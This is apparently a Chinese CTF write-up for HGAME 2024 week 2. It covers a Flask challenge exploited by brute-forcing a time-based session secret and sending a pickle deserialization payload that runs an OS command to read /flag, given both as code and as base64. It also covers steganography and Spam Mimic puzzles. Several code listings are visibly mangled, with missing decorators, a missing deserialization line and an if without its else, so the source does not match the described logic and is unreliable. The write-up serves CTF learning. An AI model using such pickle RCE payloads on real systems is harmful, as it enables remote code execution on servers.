HGAME2024 WEEK2 wp webmisc

news2025/2/23 21:33:40


What the cow say?


输入 `nl app.py` 可查看源代码,有功能具体实现、过滤之类的;

flag在 /flag_is_here home/flag_c0w54y 中,执行命令获取flag;



# app.py
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime

def index():
    session['username'] = 'guest'
    return send_file('app.py')

@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])
    # For POST requests from admin
    if session['username'] == 'admin':
        # Tips: Here try to trigger RCE
        return userdata
        return 'Access Denied'
if __name__=='__main__':
    app.run(debug=True, host="")

分析源码,/ 路由可下载app.py文件,/flag 路由会判断有无session,有session则输入对应用户名,如果session的用户名为admin,会对post传入的数据进行pickle反序列化,明显存在pickle反序列化漏洞;


开启环境,访问 / 路由,并记录时间如13:25,访问/flag此时为guest用户


# 1.py
import os

for k in range(0, 60):
    if k < 10:
        secret = '13250' + str(k)
        secret = '1325' + str(k)
    c = "eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcDf2A.gSn2YomfAAl0qozjgrBDN5194Bc"
    print(os.popen(f"python flask_session_cookie_manager3.py decode -s {secret} -c {c}").read(), end='')
    print('*****' + secret)



import pickle
import base64

class Flag(object):
    def __reduce__(self):
        return (eval, ("__import__('os').popen('cat /flag').read()",))

flag = Flag()

# payload
# pickle_data=gASVRgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwqX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IC9mbGFnJykucmVhZCgplIWUUpQu





选中请求图片的响应(241 HTTP/1.0 200 OK),选择 文件 => 导出对象 => http,导出ek1ng.jpg图片保存;





需要上下翻转看,内容为:KEY  : 5H8w1nlWCX3hQLG ,使用5H8w1nlWCX3hQLG 作为deepsound密码,成功分离出隐藏的压缩包;





结合题目描述:通过破译图片的水印来解开文档里的秘密吧!,可知两张图片为盲水印,使用blindwatermark 工具可提取盲水印,T1hi3sI4sKey,根据 恭喜.txt 中提示为压缩包密码;

# 盲水印提取
python bwmforpy3.py decode 100191209_p0.jpg image1.png password.png

# blindwatermark工具下载

使用 T1hi3sI4sKey 密码解压secret.zip,在secret.txt中有如下一段英文;

Dear E-Commerce professional ; This letter was specially
selected to be sent to you . We will comply with all
removal requests ! This mail is being sent in compliance
with Senate bill 1620 ; Title 3 ; Section 308 ! This
is not a get rich scheme ! Why work for somebody else
when you can become rich in 27 MONTHS . Have you ever
noticed more people than ever are surfing the web and
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! WE will help
YOU use credit cards on your website plus turn your
business into an E-BUSINESS . You are guaranteed to
succeed because we take all the risk ! But don't believe
us . Ms Simpson who resides in Maine tried us and says
"I've been poor and I've been rich - rich is better"
. We are a BBB member in good standing ! We urge you
to contact us today for your own future financial well-being
. Sign up a friend and you'll get a discount of 50%
. Thank-you for your serious consideration of our offer
! Dear Friend ; This letter was specially selected
to be sent to you ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2316 ; Title 8 , Section 301 ! Do NOT confuse
us with Internet scam artists . Why work for somebody
else when you can become rich as few as 24 WEEKS !
Have you ever noticed more people than ever are surfing
the web plus how many people you know are on the Internet
. Well, now is your chance to capitalize on this .
We will help you decrease perceived waiting time by
200% and turn your business into an E-BUSINESS . You
are guaranteed to succeed because we take all the risk
. But don't believe us . Mrs Simpson of Illinois tried
us and says "Now I'm rich many more things are possible"
! We assure you that we operate within all applicable
laws ! Do not delay - order today . Sign up a friend
and your friend will be rich too . Warmest regards
! Dear Sir or Madam ; Especially for you - this hot
information . We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 1916 ; Title 2 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING ! Why work for somebody else when you can
become rich in 89 days . Have you ever noticed most
everyone has a cellphone plus most everyone has a cellphone
! Well, now is your chance to capitalize on this !
WE will help YOU sell more & SELL MORE . You can begin
at absolutely no cost to you . But don't believe us
. Mr Jones of Minnesota tried us and says "I was skeptical
but it worked for me" ! We assure you that we operate
within all applicable laws ! We beseech you - act now
. Sign up a friend and you'll get a discount of 90%
. Thanks . Dear Cybercitizen ; Your email address has
been submitted to us indicating your interest in our
newsletter . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 2016 , Title 2 , Section
304 . This is different than anything else you've seen
! Why work for somebody else when you can become rich
in 48 weeks ! Have you ever noticed more people than
ever are surfing the web plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU deliver goods right to the customer's
doorstep & turn your business into an E-BUSINESS .
You can begin at absolutely no cost to you . But don't
believe us . Ms Anderson who resides in New York tried
us and says "My only problem now is where to park all
my cars" ! We are a BBB member in good standing . If
not for you then for your LOVED ONES - act now ! Sign
up a friend and you'll get a discount of 20% ! God
Bless . Dear Colleague , Your email address has been
submitted to us indicating your interest in our publication
. If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our mailing list . This
mail is being sent in compliance with Senate bill 2416
, Title 9 ; Section 308 ! This is NOT unsolicited bulk
mail . Why work for somebody else when you can become
rich within 24 MONTHS ! Have you ever noticed most
everyone has a cellphone and people love convenience
. Well, now is your chance to capitalize on this !
We will help you decrease perceived waiting time by
190% and sell more ! The best thing about our system
is that it is absolutely risk free for you ! But don't
believe us . Mrs Anderson of Indiana tried us and says
"Now I'm rich, Rich, RICH" . This offer is 100% legal
. So make yourself rich now by ordering immediately
. Sign up a friend and your friend will be rich too
. God Bless ! Dear Colleague ; We know you are interested
in receiving amazing information ! If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
1619 , Title 7 , Section 303 ! This is not multi-level
marketing . Why work for somebody else when you can
become rich within 37 days ! Have you ever noticed
nobody is getting any younger plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU decrease perceived waiting time by
140% plus deliver goods right to the customer's doorstep
. You can begin at absolutely no cost to you . But
don't believe us ! Mrs Simpson of Illinois tried us
and says "I was skeptical but it worked for me" . We
are licensed to operate in all states ! Because the
Internet operates on "Internet time" you must make
a commitment soon ! Sign up a friend and you get half
off ! Thank-you for your serious consideration of our
offer . Dear Friend ; We know you are interested in
receiving amazing info ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2716 , Title 5 , Section 303 ! This is
not a get rich scheme . Why work for somebody else
when you can become rich within 52 days ! Have you
ever noticed how many people you know are on the Internet
and the baby boomers are more demanding than their
parents ! Well, now is your chance to capitalize on
this . WE will help YOU decrease perceived waiting
time by 170% and turn your business into an E-BUSINESS
. You are guaranteed to succeed because we take all
the risk ! But don't believe us ! Mrs Anderson who
resides in Alabama tried us and says "Now I'm rich,
Rich, RICH" ! We are a BBB member in good standing
. So make yourself rich now by ordering immediately
! Sign up a friend and you get half off ! Thanks .
Dear Salaryman ; Especially for you - this red-hot
news ! We will comply with all removal requests . This
mail is being sent in compliance with Senate bill 1618
. Why work for somebody else when you can become rich
inside 27 days ! Have you ever noticed nearly every
commercial on television has a .com on in it & nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU decrease perceived waiting time by
180% plus turn your business into an E-BUSINESS . You
can begin at absolutely no cost to you ! But don't
believe us ! Prof Ames who resides in Washington tried
us and says "I was skeptical but it worked for me"
. We assure you that we operate within all applicable
laws ! We implore you - act now . Sign up a friend
and you'll get a discount of 10% . Thank-you for your
serious consideration of our offer ! Dear Friend ;
This letter was specially selected to be sent to you
! If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our club ! This mail is
being sent in compliance with Senate bill 1622 , Title
7 ; Section 303 ! Do NOT confuse us with Internet scam
artists . Why work for somebody else when you can become
rich in 10 weeks ! Have you ever noticed people will
do almost anything to avoid mailing their bills & people
love convenience ! Well, now is your chance to capitalize
on this . WE will help YOU turn your business into
an E-BUSINESS & SELL MORE . You can begin at absolutely
no cost to you ! But don't believe us . Mr Ames of
Louisiana tried us and says "Now I'm rich, Rich, RICH"
. We are licensed to operate in all states . We BESEECH
you - act now . Sign up a friend and you'll get a discount
of 50% ! Thank-you for your serious consideration of
our offer .

搜索发现是 卡尔达诺栅格码Spam Mimic ,在线网站spammimic - decode解密获得如下中文;




 对比前几个16进制数,发现与 hgame 的ascii码差9,写脚本获取flag;

a = '71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86'
flag = ''
for i in range(0, len(a), 2):
    flag += chr(int(a[i: i +2], 16) - 9)
print(flag) # hgame{0k_you_s0lve_al1_th3_secr3t}





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